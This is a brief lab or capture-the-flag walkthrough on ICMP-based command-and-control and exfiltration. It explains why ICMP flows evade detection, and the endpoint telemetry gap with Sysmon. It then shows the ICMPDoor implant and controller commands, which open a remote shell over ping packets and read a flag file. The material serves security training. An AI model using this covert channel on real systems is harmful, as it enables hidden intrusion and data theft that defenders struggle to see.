ICMP C2 communication

Data exfiltration can also leverage ICMP flows with a C2 server, using the data payload in ICMP-PING packets.

The detection of data exfiltration using this method is not easy since it’s hard to tell apart “normal”, legit ICMP traffic from ICMP flows part of an exfiltration attempt. Furthermore, some tools used for endpoint telemetry, such as Sysmon, record TCP/UDP connections but not ICMP flows.

Using the ICMPDoor tool.

On icmp host:

thm@icmp-host:~$ sudo icmpdoor -i eth0 -d

On jump host:

thm@jump-box:~$ sudo icmp-cnc -i eth1 -d
[sudo] password for thm:
shell: hostname
shell: icmp-host

Get the flag:

shell: getFlag
shell: [+] Check the flag: /tmp/flag.txt

shell: cat /tmp/flag.txt
cat /tmp/flag.txt